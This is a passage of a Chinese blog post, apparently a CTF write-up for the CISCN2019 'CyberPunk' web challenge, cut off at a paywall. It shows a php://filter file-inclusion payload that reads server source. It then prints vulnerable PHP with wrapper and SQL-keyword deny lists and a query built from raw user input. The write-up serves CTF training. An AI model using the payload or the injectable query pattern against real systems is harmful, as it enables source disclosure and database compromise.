[CISCN2019 华北赛区 Day1 Web5]CyberPunk（php://伪协议，报错注入，二次注入）

最新推荐文章于 2021-05-13 15:38:20 发布

k0f1i

最新推荐文章于 2021-05-13 15:38:20 发布

阅读量393

点赞数

分类专栏： buuctf_web

本文链接：https://blog.csdn.net/weixin_44348894/article/details/105791255

版权

进到页面：
在这里插入图片描述
（说到赛博朋克，tM居然跳票了，令人烦躁）
老规矩F12：

有个hint，见到file就想到了熟悉的php://伪协议，payload：

/index.php?file=php://filter/convert.base64-encode/resource=index.php

返回一大串base64编码内容，解码一下：

<?php
//index.php
ini_set('open_basedir', '/var/www/html/');

// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
   
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
   
        echo('no way!');
        exit;
    }
    @include($file);
}

依次读取其他php文件：

<?php
//search.php
require_once "config.php"; 
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
   
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
    
        $msg = 'no sql inject!';
    }else{
   
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql)

最低0.47元/天解锁文章

k0f1i

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[CISCN2019 华北赛区 Day1 Web5]CyberPunk（php://伪协议，报错注入，二次注入）

进到页面：（说到赛博朋克，tM居然跳票了，令人烦躁）老规矩F12：有个hint，见到file就想到了熟悉的php://伪协议，payload：/index.php?file=php://filter/convert.base64-encode/resource=index.php返回一大串base64编码内容，解码一下：<?php//index.phpini_set('...
复制链接

扫一扫